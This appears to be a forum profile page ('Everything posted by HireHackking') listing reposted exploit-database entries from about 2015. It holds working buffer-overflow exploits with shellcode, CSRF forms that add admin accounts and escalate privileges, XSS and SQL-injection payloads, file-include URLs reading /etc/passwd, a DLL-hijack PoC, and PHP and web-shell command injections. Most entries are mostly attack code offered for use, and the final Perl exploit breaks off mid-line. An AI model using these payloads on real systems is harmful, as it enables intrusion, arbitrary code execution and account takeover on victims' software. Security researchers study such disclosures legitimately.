HireHackking
Members
-
Joined
-
Last visited
Everything posted by HireHackking
-
# Exploit Author: Juan Sacco - http://www.exploitpack.com <jsacco@exploitpack.com> # Program: fbzx - ZX Spectrum Emulator for X # Tested on: GNU/Linux - Kali Linux 2.0 x86 # # Description: FBZX v2.10 and prior is prone to a stack-based buffer overflow # vulnerability because the application fails to perform adequate # boundary-checks on user-supplied input. # # An attacker could exploit this issue to execute arbitrary code in the # context of the application. Failed exploit attempts will result in a # denial-of-service condition. # # Vendor homepage: *http://www.rastersoft.com/ <http://www.rastersoft.com/>* # Kali Linux 2.0 package: http://repo.kali.org/kali/pool/contrib/f/fbzx/ # MD5: 0fc1d2e9c374c1156b2b02186a9f8980 import os,subprocess def run(): try: print "# FBZX v2.10 Stack-Based Overflow by Juan Sacco" print "# It's Fuzzing time on unusable exploits" print "# This exploit is for educational purposes only" # Basic structure: JUNK + SHELLCODE + NOPS + EIP junk = "\x41"*8 shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" nops = "\x90"*5010 eip = "\x10\xd3\xff\xbf" subprocess.call(["fbzx",' ', junk + shellcode + nops + eip]) except OSError as e: if e.errno == os.errno.ENOENT: print "FBZX not found!" else: print "Error executing exploit" raise def howtousage(): print "Sorry, something went wrong" sys.exit(-1) if __name__ == '__main__': try: print "Exploit FBZX 2.10 Local Overflow Exploit" print "Author: Juan Sacco" except IndexError: howtousage() run() -
source: https://www.securityfocus.com/bid/61571/info Jahia xCM is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Jahia xCM 6.6.1.0 r43343 is vulnerable; other versions may also be affected. <form action="http://www.example.com/administration/?do=users&sub=search" method="post" name="main"> <input type="hidden" name="searchString" value="'><script>alert(document.cookie);</script>"> <input type="submit" id="btn"> </form> <script> document.main.submit(); </script> <form action="http://www.example.com/administration/?do=users&sub=processCreate" method="post" name="main"> <input type="hidden" name="username" value="'><script>alert(document.cookie);</script>"> <input type="hidden" name="manage-user-property#j:firstName" value="'><script>alert(document.cookie);</script>"> <input type="hidden" name="manage-user-property#j:lastName" value="'><script>alert(document.cookie);</script>"> <input type="hidden" name="manage-user-property#j:email" value="'><script>alert(document.cookie);</script>"> <input type="hidden" name="manage-user-property#j:organization" value="'><script>alert(document.cookie);</script>"> <input type="hidden" name="actionType" value='save'> <input type="submit" id="btn"> </form> <script> document.main.submit(); </script>
-
R-Scripts VRS 7R Multiple Stored XSS And CSRF Vulnerabilities Vendor: R-Scripts Product web page: http://www.r-scripts.com Affected version: 7R Summary: PHP Vacation Rental Script is the best solution for your vacation rentals online business. Desc: The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Stored cross-site scripting vulnerabilitity was also discovered. The issue is triggered when input passed via multiple POST parameters is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Apache/2.2.29 PHP/5.3.29 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5274 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5274.php 01.10.2015 -- CSRF Add Admin: --------------- <html> <body> <form action="http://127.0.0.1/admin/users/add" method="POST" enctype="multipart/form-data"> <input type="hidden" name="role" value="admin" /> <input type="hidden" name="username" value="Testingus" /> <input type="hidden" name="password" value="123123" /> <input type="hidden" name="retype_password" value="123123" /> <input type="hidden" name="generate_password_label" value=" Generate password" /> <input type="hidden" name="name" value="Test" /> <input type="hidden" name="email" value="test@test.tld" /> <input type="hidden" name="phone" value="111111111" /> <input type="hidden" name="phone2" value=" " /> <input type="hidden" name="sms_phone" value=" " /> <input type="hidden" name="sms_active" value="0" /> <input type="hidden" name="fax" value=" " /> <input type="hidden" name="country" value="Uganda" /> <input type="hidden" name="location" value="N" /> <input type="hidden" name="address" value="Address" /> <input type="hidden" name="zip" value=" " /> <input type="hidden" name="active_newsletter" value="0" /> <input type="hidden" name="active" value="1" /> <input type="hidden" name="banned" value="0" /> <input type="hidden" name="ban_reason" value=" " /> <input type="hidden" name="verified_user" value="1" /> <input type="hidden" name="paypal_email" value=" " /> <input type="hidden" name="submitf" value="submit" /> <input type="submit" value="CSRF Add Admin" /> </form> </body> </html> Privilege Escalation: --------------------- <html> <body> <form action="http://127.0.0.1/admin/users/edit/4" method="POST" enctype="multipart/form-data"> <input type="hidden" name="role" value="admin" /> <input type="hidden" name="username" value="member" /> <input type="hidden" name="password" value=" " /> <input type="hidden" name="retype_password" value=" " /> <input type="hidden" name="generate_password_label" value=" Generate password" /> <input type="hidden" name="name" value="Member" /> <input type="hidden" name="email" value="vrs_owner@vacationrentalscript.com" /> <input type="hidden" name="phone" value=" " /> <input type="hidden" name="phone2" value=" " /> <input type="hidden" name="sms_phone" value=" " /> <input type="hidden" name="sms_active" value="0" /> <input type="hidden" name="fax" value=" " /> <input type="hidden" name="country" value="Germany" /> <input type="hidden" name="location" value="test" /> <input type="hidden" name="address" value="test address" /> <input type="hidden" name="zip" value=" " /> <input type="hidden" name="active_newsletter" value="1" /> <input type="hidden" name="active" value="1" /> <input type="hidden" name="banned" value="0" /> <input type="hidden" name="ban_reason" value=" " /> <input type="hidden" name="verified_user" value="1" /> <input type="hidden" name="paypal_email" value="sandbox_owner2@vacationrentalscript.com" /> <input type="hidden" name="submitf" value="submit_view" /> <input type="submit" value="Escalate" /> </form> </body> </html> Stored XSS: ----------- <html> <body> <form action="http://127.0.0.1/admin/mail_templates/add" method="POST"> <input type="hidden" name="alias" value='" onmousemove=confirm(1) >' /> <input type="hidden" name="sender_name" value='" onmousemove=confirm(2) >' /> <input type="hidden" name="sender_email" value='" onmousemove=confirm(3) >' /> <input type="hidden" name="bcc_copy" value='" onmousemove=confirm(4) >' /> <input type="hidden" name="subject_1" value='" onmousemove=confirm(5) >' /> <input type="hidden" name="subject_2" value=" " /> <input type="hidden" name="subject_3" value=" " /> <input type="hidden" name="subject_4" value=" " /> <input type="hidden" name="subject_5" value=" " /> <input type="hidden" name="body_1" value="test" /> <input type="hidden" name="body_2" value=" " /> <input type="hidden" name="body_3" value=" " /> <input type="hidden" name="body_4" value=" " /> <input type="hidden" name="body_5" value=" " /> <input type="hidden" name="active" value="1" /> <input type="hidden" name="is_bulk_mail" value="0" /> <input type="hidden" name="submitf" value="submit_view" /> <input type="submit" value="XSS Add Mail" /> </form> </body> </html> Stored XSS: ----------- <html> <body> <form action="http://127.0.0.1/admin/locations/add" method="POST"> <input type="hidden" name="location_selected_id" value="0" /> <input type="hidden" name="temp_lat" value="0" /> <input type="hidden" name="temp_lng" value="0" /> <input type="hidden" name="title_1" value='" onmousemove=confirm(1) >' /> <input type="hidden" name="title_2" value=" " /> <input type="hidden" name="title_3" value=" " /> <input type="hidden" name="title_4" value=" " /> <input type="hidden" name="title_5" value=" " /> <input type="hidden" name="location_parent_id" value="-1" /> <input type="hidden" name="slug_1" value=" " /> <input type="hidden" name="slug_2" value=" " /> <input type="hidden" name="slug_3" value=" " /> <input type="hidden" name="slug_4" value=" " /> <input type="hidden" name="slug_5" value=" " /> <input type="hidden" name="lat" value='" onmousemove=confirm(2) >' /> <input type="hidden" name="lng" value='" onmousemove=confirm(3) >' /> <input type="hidden" name="zip_code" value=" " /> <input type="hidden" name="active" value="1" /> <input type="hidden" name="submitf" value="submit" /> <input type="submit" value="XSS Add Location" /> </form> </body> </html> Stored XSS: ----------- <html> <body> <form action="http://127.0.0.1/admin/coupons/add" method="POST"> <input type="hidden" name="start_date" value=" " /> <input type="hidden" name="start_date_picker" value=" " /> <input type="hidden" name="end_date" value="2015-11-12" /> <input type="hidden" name="end_date_picker" value='" onmousemove=confirm(1) >' /> <input type="hidden" name="title" value='" onmousemove=confirm(2) >' /> <input type="hidden" name="hash" value="RG8AVL" /> <input type="hidden" name="coupon_code" value='" onmousemove=confirm(3) >' /> <input type="hidden" name="discount" value='" onmousemove=confirm(4) >' /> <input type="hidden" name="utimes" value='" onmousemove=confirm(5) >' /> <input type="hidden" name="active" value="1" /> <input type="hidden" name="submitf" value="submit_view" /> <input type="submit" value="XSS Add Coupons" /> </form> </body> </html>
-
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-B374K-CSRF-CMD-INJECTION.txt Vendor: ============================================ github.com/b374k/b374k code.google.com/p/b374k-shell/downloads/list code.google.com/archive/p/b374k-shell/ Product: ============================================== b374k versions 3.2.3 and 2.8 b374k is a PHP Webshell with many features such as: File manager (view, edit, rename, delete, upload, download as archive,etc) Command execution, Script execution (php, perl, python, ruby, java, node.js, c) Give you shell via bind/reverse shell connect Connect to DBMS (mysql, mssql, oracle, sqlite, postgresql, and many more using ODBC or PDO) Process list/Task manager. This is useful for system/web admin to do remote management without opening cpanel, connecting using ssh, ftp etc. All actions take place within a web browser. Note: b374k is considered by some as a malicious backdoor and is flagged by some AV upon download. Vulnerability Type: ============================= CSRF Remote Command Injection Vulnerability Details: ===================== No CSRF protection exists in b374k Web Shell allowing arbitrary OS command injection, if currently logged in user visits our malicious website or clicks our infected linxs. vulnerable b374k code: <?php if(isset($_GP['cmd'])) <------ $_GP holds value of $_GET passed to the shell. <form action='<?php echo $s_self; ?>' method='post'> <input id='cmd' onclick="clickcmd();" class='inputz' type='text' name='cmd' style='width:70%;' value='<?php if(isset($_GP['cmd'])) echo ""; else echo "- shell command -"; ?>' /> <noscript><input class='inputzbut' type='submit' value='Go !' name='submitcmd' style='width:80px;' /></noscript> </form> Exploit code(s): ================= Run Windows calc.exe as POC... [CSRF Command Injections] v3.2 Adding password and packing to b374k single PHP file. c:\xampp\htdocs\b374k-master>php -f index.php -- -o myshell.php -p abc123 -s -b -z gzcompress -c 9 b374k shell packer 0.4.2 Filename : myshell.php Password : xxxxxx Theme : default Modules : convert,database,info,mail,network,processes Strip : yes Base64 : yes Compression : gzcompress Compression level : 9 Result : Succeeded : [ myshell.php ] Filesize : 111419 (CSRF Command injection 1) <form id='ABYSMALGODS' action=' http://localhost/b374k-master/myshell.php?run=convert,database,info,mail,network,processes' method='post'> <input id='cmd' type='text' name='terminalInput' value='calc.exe' /> <script>document.getElementById('ABYSMALGODS').submit()</script> </form> v2.8 (CSRF Command injection 2) <form id='HELL' action='http://localhost/b374k-2.8.php?' method='post'> <input id='cmd' type='text' name='cmd' value='calc.exe' /> <script>document.getElementById('HELL').submit()</script> </form> Exploitation Technique: ======================= Remote Severity Level: =============== High Description: ================================================== Request Method(s): [+] POST Vulnerable Product: [+] b374k 3.2 and 2.8 Vulnerable Parameter(s): [+] terminalInput, cmd Affected Area(s): [+] OS [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
-
# Exploit Author: Juan Sacco - http://www.exploitpack.com <jsacco@exploitpack.com> # Program: tack - Terminal action checker # Tested on: GNU/Linux - Kali Linux 2.0 x86 # # Description: TACK v1.07 and prior is prone to a stack-based buffer overflow # vulnerability because the application fails to perform adequate # boundary-checks on user-supplied input. # # An attacker could exploit this issue to execute arbitrary code in the # context of the application. Failed exploit attempts will result in a # denial-of-service condition. # # Vendor homepage: *http://www.z <http://www.rastersoft.com/>nyx.com <http://nyx.com>* # Kali Linux 2.0 package: pool/main/t/tack/tack_1.07-1_amd64.deb # MD5: 0fc1d2e9c374c1156b2b02186a9f8980 import os,subprocess def run(): try: print "# TACK v1.07 Stack-Based Overflow by Juan Sacco" print "# It's Fuzzing time on unusable exploits" print "# This exploit is for educational purposes only" # Basic structure: JUNK + SHELLCODE + NOPS + EIP junk = "\x41"*10 shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" nops = "\x90"*3022 eip = "\x30\xd1\xff\xbf" subprocess.call(["tack",' ', junk + shellcode + nops + eip]) except OSError as e: if e.errno == os.errno.ENOENT: print "TACK not found!" else: print "Error executing exploit" raise def howtousage(): print "Sorry, something went wrong" sys.exit(-1) if __name__ == '__main__': try: print "Exploit TACK 1.07 Local Overflow Exploit" print "Author: Juan Sacco" except IndexError: howtousage() run()
-
#!/usr/bin/env python # Exploit Title : Sam Spade 1.14 S-Lang Command Field SEH Overflow Crash PoC # Discovery by : Nipun Jaswal # Email : mail@nipunjaswal.info # Discovery Date : 12/11/2015 # Vendor Homepage : http://samspade.org # Software Link : http://www.majorgeeks.com/files/details/sam_spade.html # Tested Version : 1.14 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS : Windows XP Professional SP2 x86 es # Crash Point : Go to Tools > S-Lang Command> Enter the contents of 'sam_spade_slang_dos.txt' > OK , Note: Do Not Remove the round bracket ########################################################################################## # -----------------------------------NOTES----------------------------------------------# ########################################################################################## # And the Stack #00FBFE80 41414141 AAAA #00FBFE84 41414141 AAAA #00FBFE88 42424242 BBBB Pointer to next SEH record #00FBFE8C 43434343 CCCC SE handler # After the execution of POC, the SEH chain looks like this: #Address SE handler #00FBFE88 43434343 #42424242 *** CORRUPT ENTRY *** f = open("sam_spade_slang_dos.txt", "w") Junk_a = "A"*528 nseh= "B" * 4 seh= "C" *4 f.write(Junk_a+nseh+seh) f.close()
-
source: https://www.securityfocus.com/bid/61578/info SilverStripe is prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information that may aid in further attacks. SilverStripe 3.0.3 is vulnerable; other versions may also be affected. http://<X.X.X.X:Port>/Security/LoginForm?AuthenticationMethod=MemberAuthenticator&Email=<email>&Password=<password>&BackURL=%2Fadmin%2Fpages&action_dologin=Log+in
-
source: https://www.securityfocus.com/bid/61745/info HTC Sync Manager is prone to multiple arbitrary code-execution vulnerabilities. An attacker can exploit these issues by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. HTC Sync Manager 2.1.46.0 is vulnerable; other versions may also be affected. #include <windows.h> #define DllExport __declspec (dllexport) DllExport void DwmSetWindowAttribute() { egg(); } int egg() { system ("calc"); exit(0); return 0; }
-
source: https://www.securityfocus.com/bid/61735/info Advanced Guestbook is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. Advanced Guestbook 2.4.3 is vulnerable; other versions may also be affected. http://www.example.com.tw/guestbook/addentry.php
-
source: https://www.securityfocus.com/bid/61733/info AlgoSec Firewall Analyzer is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. AlgoSec Firewall Analyzer 6.1-b86 is affected; other versions may also be vulnerable. http//www.example.com/afa/php/Login.php/>'><ScRiPt>alert(11111111)</ScRiPt> HTTP/1.1
-
source: https://www.securityfocus.com/bid/61728/info Kwok Information Server is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Kwok Information Server 2.7.3 and 2.8.4 are vulnerable; other versions may also be affected. http://www.example.com/kwok/IT/hardware-list.dll?cmd=search&hardwareType=49[Inject Payload Here] http://www.example.com/kwok/IT/hardware-list.dll?cmd=search&hardwareStatus=0[Inject Payload Here] http://www.example.com/kwok/IT/hardware-list.dll?cmd=search&hardwareLocation=0[Inject Payload Here]
-
source: https://www.securityfocus.com/bid/61746/info CakePHP is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker can exploit this vulnerability to view files or execute arbitrary script code in the context of the web server process. This may aid in further attacks. CakePHP 2.2.8 and 2.3.7 are vulnerable; other versions may also be affected. http://www.example.com/cakephp-2.3.7/theme/Test1/%2e.//%2e.//%2e.//%2e. //%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e./etc/passwd http://www.example.com/cakephp-2.3.7/DebugKit/%2e.//%2e.//%2e.//%2e.// %2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e./etc/passwd
-
source: https://www.securityfocus.com/bid/61770/info DotNetNuke is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. DotNetNuke prior to versions 7.1.1 and 6.2.9 are vulnerable. http://www.example.com/?__dnnVariable={'__dnn_pageload':'alert(/XSS/)'}
-
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-CFIMAGEHOST-PHP-CMD-INJECTION.txt Vendor: ==================================== codefuture.co.uk/projects/imagehost Product: =================================== CF Image Host 1.65 - 1.6.6 Archive download listed as: version 1.65 unzips as imagehost 1.6.6 Vulnerability Type: ===================== PHP Command Injection CVE Reference: ============== N/A Vulnerability Details: ===================== CF Imagehost allows users who have access to the management area the ability to write directly to the 'set.php' page under the /inc directory that stores setting values for the 'Site Title', 'Site Slogan' etc, this allows a local attacker ability to inject specially crafted PHP command payloads to execute arbitrary operating system commands on the victim host. Possibly leading to privilege escalation, RFI, backdoors etc.. and most likely full compromise of the affected system or shared environment if applicable. PHP Command Injection Exploit code(s): ===================================== Under the setting tab we can inject following below PHP code and it will remain persistent as it is written disk in 'set.php', afterwards when the victim visits the application and click a tab the persistent OS command will be executed. 1) navigate to CF image host settings tab http://localhost/imagehost1.6.6/admin.php?act=set 2) click on admin menu on left and enter your passwords DO NOT click 'Save changes' yet! or you get error message to enter creds 3) now go back to settings tab and click 'General' then inject below PHP code into the 'Site Title' input field 4) now click 'Save Changes', this code will get stored under /inc directory within the 'set.php' PHP file. our PHP injection payload needs the single quotes, double back slashes, semicolons as described below to correctly escape the syntax so we do not break the PHP page and cause errors, our extra \\ quoutes and ; gets removed after injection takes place. some examples... ';echo exec("c:\\Windows\\system32\\calc.exe");'';'; 'set.php' on line 11 then becomes: $settings['SET_TITLE'] = '';echo exec("c:\Windows\system32\calc.exe");'';';'; OR inject CMD to launch chrome.exe etc... ';echo exec("c:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe");'';'; After, click on some tabs above like 'Database' or 'Ban User' and Tada! this will execute our stored PHP command... either running calc.exe or launching Google Chrome. Disclosure Timeline: ===================== Vendor Notification: NA November 13, 2015 : Public Disclosure Exploitation Technique: ======================= Local / Remote Severity Level: ================ High Description: ================================================================ Request Method(s): [+] POST Vulnerable Product: [+] CF Image Host 1.65 - 1.6.6 Vulnerable Parameter(s): [+] 'Site Title', 'Site Slogan' etc.. Affected Area(s): [+] OS [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
-
<!-- [+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-CFIMAGEHOST-CSRF.txt Vendor: ==================================== codefuture.co.uk/projects/imagehost Product: =================================== CF Image Host 1.65 - 1.6.6 Archive download listed as: version 1.65 unzips as imagehost 1.6.6 Vulnerability Type: ================================= Cross site request forgery - CSRF CVE Reference: ============== N/A Vulnerability Details: ===================== No CSRF protection exists allowing attackers to make requests to the server on behalf of the victim if they are logged in and visit a malicious site or click an infected linx. This will let attackers modify certain web application settings to whatever the attacker wishes. CSRF Exploit code(s): ==================== --> <form id='HELL' method="POST" action=" http://localhost/imagehost1.6.6/admin.php?act=set"> <input type="text" name="setScriptUrl" value=" http://hyp3rlinx.altervista.org" /> <input type="text" name="setTitle" value="ghostofsin" /> <input type="text" name="setSlogan" value="666" /> <input type="text" name="setCopyright" value="hyp3rlinx" /> <input type="text" name="setTheme" value="day" /> <input type="text" name="setModeRewrite" value="0" /> <input type="text" name="setAddThis" value="0" /> <input type="text" name="setLanguage" value="0" /> <input type="text" name="changesettings" value="Save+Changes" /> <input type="text" name="setModeRewrite" value="0" /> <input type="text" name="setAllowReport" value="1" /> <input type="text" name="setEmailReport" value="1" /> <input type="text" name="setHideGallery" value="1" /> <input type="text" name="setHideContact" value="1" /> <input type="text" name="setHideTos" value="1" /> <input type="text" name="setHideFaq" value="1" /> <input type="text" name="setHideSearch" value="1" /> <input type="text" name="setImageWidgit" value="1" /> <input type="text" name="setHideFeed" value="1" /> <input type="text" name="setHideSitemap" value="1" /> <input type="text" name="setAutoDeleted" value="0" /> <input type="text" name="setAutoDeletedTime" value="10" /> <input type="text" name="setAutoDeletedJump" value="m" /> <input type="text" name="setDisUpload" value="0" /> <input type="text" name="setAutoDeleted" value="0" /> <input type="text" name="setMaxSize" value="1048576" /> <input type="text" name="setMaxBandwidth" value="1024" /> <input type="text" name="setBandwidthReset" value="m" /> <input type="text" name="setMaxUpload" value="5" /> <input type="text" name="setNoDuplicate" value="0" /> <input type="text" name="setResizeImg" value="1" /> <input type="text" name="setPrivateImg" value="1" /> <input type="text" name="setWaterMark" value="0" /> <input type="text" name="setWatermarkText" value="0" /> <input type="text" name="setWatermarkImage" value="1" /> <input type="text" name="setWatermarkPlaced" value="1" /> <input type="text" name="setSUrlApi" value="b54" /> <input type="text" name="setSUrlApiUrl" value="" /> <input type="text" name="setSUrlApiUesr" value="" /> <input type="text" name="setSUrlApiPass" value="" /> <input type="text" name="setAnalytics" value="" /> <input type="text" name="setGoogleCha" value="" /> <input type="text" name="setGoogleAds" value="" /> <input type="text" name="oldPassword" value="" /> <input type="text" name="newPassword" value="" /> <input type="text" name="newConfirm" value="" /> <input type="text" name="setUserName" value="admin" /> <input type="text" name="setEmail" value="ghostofsin@abyss.com" /> <script>document.getElementById('HELL').submit()</script> </form> <!-- Disclosure Timeline: ===================== Vendor Notification: NA November 14, 2015 : Public Disclosure Exploitation Technique: ======================= Remote Severity Level: ================ High Description: ============================================================ Request Method(s): [+] POST Vulnerable Product: [+] CF Image Host 1.65 - 1.6.6 [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx -->
-
source: https://www.securityfocus.com/bid/61801/info ACal is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input before being used to include files. An attacker can exploit this vulnerability to view files or execute arbitrary script code in the context of the web server process. This may aid in further attacks. ACal 2.2.6 is vulnerable; other versions may also be affected. http://www.example.com/calendar/embed/example/example.php?view=../../etc/passwd%00
-
#!/usr/bin/perl # # # TECO SG2 LAD Client 3.51 SEH Overwrite Buffer Overflow Exploit # # # Vendor: TECO Electric and Machinery Co., Ltd. # Product web page: http://www.teco-group.eu # Download: http://globalsa.teco.com.tw/support_download.aspx?KindID=9 # Affected version: 3.51 and 3.40 # # Summary: SG2 Client is a program that enables to create and edit applications. # The program is providing two edit modes, LADDER and FBD to rapidly and directly # input the required app. The Simulation Mode allows users to virtually run and test # the program before it is loaded to the controller. # # Desc: The vulnerability is caused due to a boundary error in the processing of a # Genie LAD file, which can be exploited to cause a buffer overflow when a user opens # e.g. a specially crafted .GEN file. Successful exploitation could allow execution # of arbitrary code on the affected machine. # # --------------------------------------------------------------------------------- # (10bc.1358): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=00000000 ebx=00000000 ecx=43434343 edx=7794b4ad esi=00000000 edi=00000000 # eip=43434343 esp=0018dc24 ebp=0018dc44 iopl=0 nv up ei pl zr na pe nc # cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246 # 43434343 ?? ??? # 0:000> !exchain # 0018dc38: ntdll!LdrRemoveLoadAsDataTable+d64 (7794b4ad) # 0018e1d4: ntdll!LdrRemoveLoadAsDataTable+d64 (7794b4ad) # 0018e800: MFC42!Ordinal1580+373 (708df2fc) # 0018f098: 43434343 # Invalid exception stack at 42424242 # --------------------------------------------------------------------------------- # # Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit # Microsoft Windows 7 Ultimate SP1 (EN) 64bit # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2015-5275 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5275.php # # # 09.10.2015] # # 113 bytes MessageBox shellcode my $sc = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42". "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03". "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b". "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e". "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c". "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x65\x64". "\x21\x01\x68\x20\x50\x77\x6e\x68\x20\x5a\x53\x4c\x89\xe1\xfe". "\x49\x0b\x31\xc0\x51\x50\xff\xd7"; # Address = 0041D659 # Message = 0x0041d659 : pop edi # pop esi # ret 0x04 # startnull {PAGE_EXECUTE_READ} [LAD.exe] # ASLR: False; # Rebase: False; # SafeSEH: False; # OS: False; # v0.2.9.0 (C:\Program Files (x86)\TECO\SG2 Client\LAD.exe) my $file = "lad.gen"; my $junk = "\x41" x 21750 . "\xEB\x08\x90\x90" . "\x59\xd6\x41\x00" . "\x90" x 28 . $sc . "\x90" x 20; open($FILE,">$file"); print $FILE "$junk"; close($FILE); print "Malicious GEN file created successfully!\n";
-
#!/usr/bin/perl # # # TECO JN5 L510-DriveLink 1.482 SEH Overwrite Buffer Overflow Exploit # # # Vendor: TECO Electric and Machinery Co., Ltd. # Product web page: http://www.teco-group.eu # Download: http://globalsa.teco.com.tw/support_download.aspx?KindID=9 # Affected version: 1.482 and 1.462 # # Summary: JN5 DriveLink is a free program that enables you to # configure the AC Motor Drive, 510 Series PC-Link. It provides # support for sleep and fire modes favourable for pumps, fans, # compressors, and HVAC and communication network protocol of # Modbus/ BACnet/ Metasys N2. # # Desc: The vulnerability is caused due to a boundary error in the # processing of a project file, which can be exploited to cause a # buffer overflow when a user opens e.g. a specially crafted .LF5 file. # Successful exploitation could allow execution of arbitrary code on # the affected machine. # # --------------------------------------------------------------------------------- # (14c0.12ec): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\MFC42.DLL - # *** WARNING: Unable to verify checksum for C:\Program Files (x86)\TECO\JN5 DriveLink\L510-DriveLink\L510-DriveLink.exe # *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\TECO\JN5 DriveLink\L510-DriveLink\L510-DriveLink.exe # eax=000026a0 ebx=0018f430 ecx=41414141 edx=00000001 esi=0018f408 edi=ffffd961 # eip=70735d7e esp=0018f350 ebp=0018f364 iopl=0 nv up ei ng nz na po nc # cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210282 # MFC42!Ordinal2740+0xaa: # 70735d7e 8b01 mov eax,dword ptr [ecx] ds:002b:41414141=???????? # 0:000> !exchain # 0018f3e4: 41414141 # Invalid exception stack at 41414141 # --------------------------------------------------------------------------------- # # Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit # Microsoft Windows 7 Ultimate SP1 (EN) 64bit # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2015-5279 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5279.php # # # 09.10.2015] # my $header = "\x04\x00\x00\x00\x0A\x00\x00\x00\x4C\x35\x31\x30\x2D\x31". "\x50\x32\x2D\x48\x0E\x00\x00\x00\x14\x00\x00\x00\x01\x00"; # 113 bytes MessageBox shellcode my $sc = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42". "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03". "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b". "\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e". "\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c". "\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x65\x64". "\x21\x01\x68\x20\x50\x77\x6e\x68\x20\x5a\x53\x4c\x89\xe1\xfe". "\x49\x0b\x31\xc0\x51\x50\xff\xd7"; my $buffer = "A" x 43 . "\xEB\x06\x90\x90" . "\xB0\x5D\x40\x00" . "\x90" x 16 . $sc . "\x90" x 20 . "D" x 2627; my $file = "Gaming Nerdz.lf5"; my $junk = 